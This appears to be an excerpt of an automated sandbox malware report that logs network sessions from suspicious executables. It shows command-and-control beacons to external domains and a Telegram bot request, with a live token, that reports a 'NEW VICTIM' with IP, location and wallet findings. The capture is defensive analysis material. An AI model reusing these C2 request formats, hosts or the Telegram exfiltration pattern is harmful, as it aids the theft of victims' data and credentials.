1e d0 e2 31 5f ae ff d9 75 db bc d7 26 dd 31 ff ed 5f 1e 2d 7b e9 94 e8 83 23 c6 1f 49 4c 73 01 a4 da 3e 70 47 50 6d d6 ab 38 f1 c4 54 8b 5b 6a 60 45 69 2a Data Ascii: gVd1_8Db''5ov>m{'At,RebKjI@Q[[EE@ aKsi_0sg9!]vTUq/43{{L{,YgN&hqI#6R[Z&6cKlEQ>c.m3Gx,1y<?dW1_u&1_-{#ILs>pGPm8T[j`Ei*
2024-12-22 01:16:58 UTC	1390	IN	Data Raw: e6 af 62 3d fd 13 11 fd c1 ed 76 1f 2f 93 5a ea 61 d0 6f 45 c7 20 04 e3 38 d1 21 48 b1 a5 65 62 4b eb ca 23 44 97 88 f8 bb bf ba f5 3f 30 f6 dc ee 26 c4 cc f7 e7 e4 e4 0c f0 78 3c 73 88 28 0d 2f fc 53 5c fd ea c0 be a2 c3 10 41 01 62 de ce 22 89 97 96 43 91 69 dd 63 63 9c 26 a2 d9 f5 75 3b b1 b2 7a 0b 3c b9 9d 23 ff 5c 6a 18 c6 55 45 45 45 01 11 b1 48 49 b2 a1 ba 1f 6c de 39 dd 29 98 94 96 77 5f 95 84 49 cb c4 96 b6 3d b6 17 6f 3b 18 e1 70 6f 51 cd 2f db f9 f3 36 b5 5d 97 ab dc 6e f7 33 b2 87 d6 06 b8 70 68 fa 6e c1 c9 fd 44 47 20 c5 96 96 43 91 69 db 63 0b 87 3d 22 9b 7f fc d7 55 af cb 61 c7 36 c4 50 ba 88 0e 41 a0 74 fe d9 1d 2f 2d 13 5b da f6 d8 80 83 44 36 5e cb c6 7e 22 db 97 92 8c 90 2f 3a 04 81 da a1 b8 38 2d 87 61 53 41 5a 26 b6 b4 ed b1 11 89 fe Data Ascii: b=v/ZaoE 8!HebK#D?0&x<s(/S\Ab"Cicc&u;z<#\jUEEEHIl9)w_I=o;poQ/6]n3phnDG Cic="Ua6PAt/-[D6^~"/:8-aSAZ&
2024-12-22 01:16:58 UTC	1390	IN	Data Raw: 09 83 f8 29 d4 66 5f d7 50 8e ca 11 fc 7e ff 68 8a f4 2a e3 1f 92 dd c0 cc f7 b8 5c ae fb dd 6e 77 6d b3 af 9c 37 b3 1f 98 4f 06 f3 71 00 0a 33 48 39 28 c4 46 6e b6 e2 42 47 25 13 bd b3 f3 a1 e6 74 46 2e 65 dc f9 f0 7b c1 5b ea 6f d6 8d 4f 30 18 1c 69 18 c6 7d 00 8a 4c bc 3c 72 fe 7f 19 86 71 9d 9c 7f 73 a8 91 a7 5e 40 c4 73 44 87 61 85 1e 9d 3a 18 af dd 34 59 d9 ab b7 d6 94 85 8a a2 5c ef 76 bb 57 d8 13 99 35 64 62 4b a6 25 5a 06 36 d0 6d 60 dc e0 b0 d8 be 03 f1 d9 a2 7b 6f c1 60 f0 08 c3 30 ee 02 30 3c ce 43 77 12 d1 43 d9 d9 d9 77 f4 eb d7 2f a1 aa 23 81 40 60 02 33 3f dd c4 53 13 54 55 7d 26 91 73 62 cf f9 b7 bf 02 e8 69 e2 90 2d cc 3c ab ad ce 6d a4 ba 4e e3 ce 29 df ba 63 e7 61 a2 e3 48 b6 03 ba 77 bd e8 cd 5b ae 29 60 e6 ab 4d 8c 20 19 44 f4 62 38 Data Ascii: )f_P~h*\nwm7Oq3H9(FnBG%tF.e{[oO0i}L<rqs^@sDa:4Y\vW5dbK%Z6m`{o`00<CwCw/#@`3?STU}&sbi-<mN)caHw[)`M Db8
2024-12-22 01:16:58 UTC	1390	IN	Data Raw: 4c 63 e6 8b 13 d8 5d 61 21 11 5d e7 f1 78 2a 12 0b 33 71 4e 4a 6c d8 f3 fe b7 bb 00 34 b9 2f ce 5e 22 1f c6 7b f2 f2 f2 66 f5 e9 d3 a7 3a e9 01 cd d3 0a 60 28 8f 00 3c 32 e9 e7 ae f7 31 14 ba dc 8e 1e 1c 33 93 ae eb 67 2a 8a f2 57 66 ee 6d e2 90 3a 00 8f d6 d4 d4 4c 8b 39 7a 70 e2 89 1d a8 2e eb 19 30 c6 25 3d e0 e4 d8 c9 e0 cb b0 e8 b5 a4 57 ee 0f 04 02 87 37 bc 4f cd 5c ec 54 01 b8 77 fb f6 ed 77 0d 1b 36 6c 57 b2 63 31 4b 26 b6 78 2c d1 32 f0 2b 95 9b ac 34 91 5a 18 e7 c6 aa 91 88 fa f9 89 bc 70 38 7c 05 11 45 7a aa f9 71 9e fd f3 86 1e 87 b0 72 3d 4e 4b 6c 8d 12 98 7f fb 8e 88 6e 71 bb dd cf 50 32 7a 40 d1 32 64 33 af 07 f3 4c 1b 4a bf 85 41 7c 17 ba 61 3a 46 68 21 2b 1a 68 28 02 70 3f 80 61 26 0f 59 00 60 b2 aa aa 5f 99 78 2d 61 d4 b8 89 04 fa ab a0 Data Ascii: Lc]a!]x3qNJl4/^"{f:`(<213gWfm:L9zp.0%=W7O\Tww6lWc1K&x,2+4Zp8\|Ezqr=NKlnqP2z@2d3LJA\|a:Fh!+h(p?a&Y`_x-a
2024-12-22 01:16:58 UTC	1390	IN	Data Raw: 71 c6 2d df 36 3e 10 0c 06 b3 0c c3 f8 4b c3 76 40 66 4a 3c 59 33 8f 66 b1 55 ab 56 ed b7 69 db f6 1f 8e b9 e9 b6 7d 9e cb ca 70 7d 53 f3 d6 4b 29 57 d2 0b 7b ee 92 3f cb 64 e9 c1 55 0d c3 93 ff db 19 bf 74 c6 61 00 47 7a dc ed 2c 0e f7 13 6c ee f5 5b 5c 76 59 9d c5 ed 98 62 fd 4d d2 75 a1 51 e9 94 d4 22 96 55 35 b9 0a 7b 33 33 4f d9 be 7d 7b 7f af d7 fb 44 2a 25 b5 b6 24 f2 81 f7 7a bd 65 35 35 35 85 91 bf 47 c3 0d b1 cd 69 0f 60 7a be c2 6b 1c 9c d4 10 fd e2 0a 85 fe 5b b7 34 10 08 8c 35 0c a3 12 c0 03 26 93 da 02 c3 30 0a 54 55 9d 94 4a 49 ad 25 6c 38 6e 6f 47 d3 88 c8 88 bc 57 15 45 19 c8 cc 97 01 f8 b5 85 43 0a 88 a8 34 10 08 2c ab a8 a8 f8 2d 4a ef cb 05 b8 d4 86 a4 16 71 24 3a fd 74 8d 0d ed 98 62 7d 62 53 8c 64 95 16 4a 19 eb 6a b7 e3 97 d0 7f 17 Data Ascii: q-6>Kv@fJ<Y3fUVi}p}SK)W{?dUtaGz,l[\vYbMuQ"U5{33O}{D*%$ze555Gi`zk[45&0TUJI%l8noGWEC4,-Jq$:tb}bSdJj
2024-12-22 01:16:58 UTC	1390	IN	Data Raw: d9 00 45 39 d3 09 73 6b 8d ec b9 9a a1 e8 d6 fb e9 e2 5b f8 a6 a7 65 25 f5 36 c9 37 65 2b 88 e7 8b 0e c3 3c 7a 17 be 5b e5 fc 5a 23 4a e3 1e 5b 23 9f 36 1d e0 87 2d 3a fb 66 80 4f c6 99 b7 ae b5 e8 fc 09 b1 e7 8f ce c6 4b f5 bf 80 74 40 4f 82 c8 8e ae bf 64 17 c6 bd a2 43 30 8d f9 3e d1 21 38 4c fa ce b1 ed ce a7 5d 05 a6 9b 93 3c 2d f4 15 14 fa 2d 7c da a7 49 3c 67 52 d8 93 d8 7c 5a 15 08 56 5d 31 38 c9 0e 84 8c bf 89 0e 42 4a b2 e8 07 37 25 e6 da 56 c0 37 6d 81 e8 20 1c 25 cd b6 ad 69 d6 59 d3 ee 00 f1 68 00 5f b6 f2 4c 0c c6 53 a8 e5 21 38 73 5a 30 49 d1 25 95 7d dd 74 e6 07 c4 dc 57 61 a3 48 f2 3e 57 13 b9 75 ad 64 15 c3 b8 1a 80 c3 57 1a f2 b5 72 b4 60 4f 9c 26 1b 8d 9a 56 ac 2d c5 0e 56 c1 b8 06 c0 0f f1 1c 1a b9 42 c8 20 d7 3b 30 78 18 ce 9a 7e 31 Data Ascii: E9sk[e%67e+<z[Z#J[#6-:fOKt@OdC0>!8L]<--\|I<gR\|ZV]18BJ7%V7m %iYh_LS!8sZ0I%}tWaH>WudWr`O&V-VB ;0x~1
2024-12-22 01:16:58 UTC	1390	IN	Data Raw: d3 d0 c5 96 ce 8f ee 59 d3 1b 5a 86 bb fe b5 84 10 b1 ac aa 52 ee d8 e2 4c f4 25 b6 9f 3b 3e b5 7a c9 cf db 1a 7d a2 aa 5f 02 b8 a4 91 33 f8 d1 4b af 59 6f 5c 80 42 08 53 25 27 c9 1d 5b 9c 89 fe c4 26 c2 e7 83 89 6d 91 58 75 29 98 2e fc e3 77 05 03 bb da 5a c1 4a 0a da 58 12 71 8e 2d 1d 99 49 6d 71 76 62 9a d9 51 8a 78 33 60 e8 79 00 2e 86 82 6e 0a 73 87 4b 1e 71 b6 fe 5d 2f 47 d3 c7 fb 6a 25 b1 c5 19 49 6c e2 a7 16 bc 6a c3 d1 c3 7f 04 f1 dd 40 75 5f 30 d5 95 71 5c 15 07 eb fe f9 b9 54 8b f5 65 e4 8c eb 06 9f e5 1f f8 c3 98 9d 66 84 2c e2 c0 95 43 4e 57 34 ba 97 81 3f 02 7c 5e dd d7 f8 78 3b a0 d2 63 15 f8 78 c5 d7 4d 9f 5b 5d 25 a5 c8 38 23 bf 70 71 1c 33 21 67 dc 9f 51 76 e8 3b 10 ff 0b c0 65 7a de 1f e5 be da 0e 00 46 c3 e2 fb 06 1f 3b 5f 47 8e 33 12 Data Ascii: YZRL%;>z}_3KYo\BS%'[&mXu).wZJXq-ImqvbQx3`y.nsKq]/Gj%Ilj@u_0q\Tef,CNW4?\|^x;cxM[]%8#pq3!gQv;ezF;_G3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49897	104.21.67.146	443	5040	C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:57 UTC	355	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=Y0MnBaVocaknWr71LkrwO587RjHDDvDl2Mw1arBBHbQ-1734830196-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 85 Host: cheapptaxysu.click
2024-12-22 01:16:57 UTC	85	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 26 6a 3d 26 68 77 69 64 3d 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=CZJvss--geopoxid&j=&hwid=F14195A540BC0B98AC8923850305D13E
2024-12-22 01:16:58 UTC	1128	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:16:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6jmu3hd4gjhrhecf175oqm6l8j; expires=Wed, 16 Apr 2025 19:03:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dsdsgcSIVwFzh9ief%2B%2Fi3U4CNqE2tXjNX1F8hYBrZ49AP9p4WXDF3Ka%2BfS34sGxxG7xdCXOxQmVzAZiQcTbdpnLevgI6500hiIlsrLzuxTsOEMDDZdGIs0PqMjOeAowiaWhCjnU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c44fe58574255-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=1587&rtt_var=1458&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1076&delivery_rate=579365&cwnd=225&unsent_bytes=0&cid=55ac10eb57e42c36&ts=770&x=0"
2024-12-22 01:16:58 UTC	54	IN	Data Raw: 33 30 0d 0a 69 57 72 35 54 39 49 50 70 69 47 47 53 74 75 59 4a 70 4c 74 73 51 47 58 39 36 6d 4d 36 66 4c 55 7a 62 64 73 75 6f 34 33 52 62 33 53 4e 77 3d 3d 0d 0a Data Ascii: 30iWr5T9IPpiGGStuYJpLtsQGX96mM6fLUzbdsuo43Rb3SNw==
2024-12-22 01:16:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49899	34.117.59.81	443	2212	C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:58 UTC	91	OUT	GET /json HTTP/1.1 User-Agent: IPInfoFetcher Host: ipinfo.io Cache-Control: no-cache
2024-12-22 01:16:58 UTC	345	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 321 content-type: application/json; charset=utf-8 date: Sun, 22 Dec 2024 01:16:58 GMT x-content-type-options: nosniff via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-22 01:16:58 UTC	321	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49904	149.154.167.220	443	2212	C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:17:00 UTC	513	OUT	GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20715575%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1 User-Agent: TelegramBot Host: api.telegram.org Cache-Control: no-cache
2024-12-22 01:17:01 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sun, 22 Dec 2024 01:17:00 GMT Content-Type: application/json Content-Length: 777 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-22 01:17:01 UTC	777	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 30 31 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22 Data Ascii: {"ok":true,"result":{"message_id":30111,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49908	34.117.59.81	443	4628	C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:17:01 UTC	91	OUT	GET /json HTTP/1.1 User-Agent: IPInfoFetcher Host: ipinfo.io Cache-Control: no-cache
2024-12-22 01:17:01 UTC	345	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 321 content-type: application/json; charset=utf-8 date: Sun, 22 Dec 2024 01:17:01 GMT x-content-type-options: nosniff via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-22 01:17:01 UTC	321	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49911	98.85.100.80	443	2648	C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:17:03 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-22 01:17:03 UTC	224	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:03 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-22 01:17:03 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49916	149.154.167.220	443	4628	C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:17:03 UTC	513	OUT	GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20715575%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1 User-Agent: TelegramBot Host: api.telegram.org Cache-Control: no-cache
2024-12-22 01:17:04 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sun, 22 Dec 2024 01:17:04 GMT Content-Type: application/json Content-Length: 777 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-22 01:17:04 UTC	777	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 30 31 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22 Data Ascii: {"ok":true,"result":{"message_id":30112,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50060	104.21.21.99	443	7012	C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:17:53 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: discokeyus.lat
2024-12-22 01:17:53 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-22 01:17:54 UTC	1136	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5lb06me2cjic16hr2kp511tirf; expires=Wed, 16 Apr 2025 19:04:33 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bPaKRYiwtttB5an5lBhZVnhFQk%2F4Vx0NEqQC9Pc1kYfmT%2BFpkK1UM8MZl%2F3k8bUacLbiiiMC%2BU%2F%2BxmFh7AIepuZxyLEBB2Gr%2Bw1rOMdzJ1fmpfMC8%2FYSRk0YAMYT1ZOxjw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c465d6edf8c9b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2009&min_rtt=2003&rtt_var=755&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=905&delivery_rate=1457813&cwnd=171&unsent_bytes=0&cid=e47217cda250afe9&ts=1044&x=0"
2024-12-22 01:17:54 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-22 01:17:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50068	104.21.21.99	443	7012	C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:17:56 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: discokeyus.lat
2024-12-22 01:17:56 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-22 01:17:59 UTC	1126	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o6q301dr0t74ktnua84ra5o5g5; expires=Wed, 16 Apr 2025 19:04:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YMnwo2BpAn6kH1g45mPJdkPG2SuAkTuScudMFDIWmTO0WT8VIvS9CHWgp4y%2BggOzjITfjp5x6OOW0GTYfuhC5tBj0rc8utiRLm%2BvvxAsHUYL6dAF1VMVbyhDTuuFSM%2Bwgg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c466d2b287c84-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2071&min_rtt=2065&rtt_var=778&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=945&delivery_rate=1414043&cwnd=246&unsent_bytes=0&cid=2c3a772bb9fd3b60&ts=2803&x=0"
2024-12-22 01:17:59 UTC	243	IN	Data Raw: 34 39 31 63 0d 0a 6b 32 44 39 77 64 2f 61 47 32 45 47 65 6c 35 77 42 71 61 52 71 46 34 47 73 37 56 77 53 34 59 67 59 66 39 51 4a 6f 4a 4d 59 53 4c 6f 51 6f 76 6a 35 65 34 33 51 33 55 66 66 45 70 79 31 4f 54 4e 63 69 54 53 30 56 4a 78 34 45 45 4e 6a 44 55 4b 6f 44 6f 4d 41 4b 6b 47 6e 4b 32 73 76 7a 64 44 59 77 4a 38 53 6c 33 64 73 38 30 77 4a 49 6d 58 46 53 48 6b 51 51 32 64 4d 55 33 74 50 41 31 42 2b 77 79 61 71 62 71 35 66 77 42 71 46 7a 73 56 59 38 66 37 78 6a 64 72 32 39 68 53 5a 36 52 46 47 39 31 71 42 4d 38 70 46 55 50 65 41 59 36 71 2f 61 63 33 47 69 51 66 4d 46 49 38 68 50 44 4e 50 47 72 56 30 52 73 6a 37 6b 67 46 6e 44 52 4d 38 69 55 48 53 76 73 43 6d 61 69 77 73 47 73 4e 59 42 41 77 45 32 6e 48 73 34 52 38 59 Data Ascii: 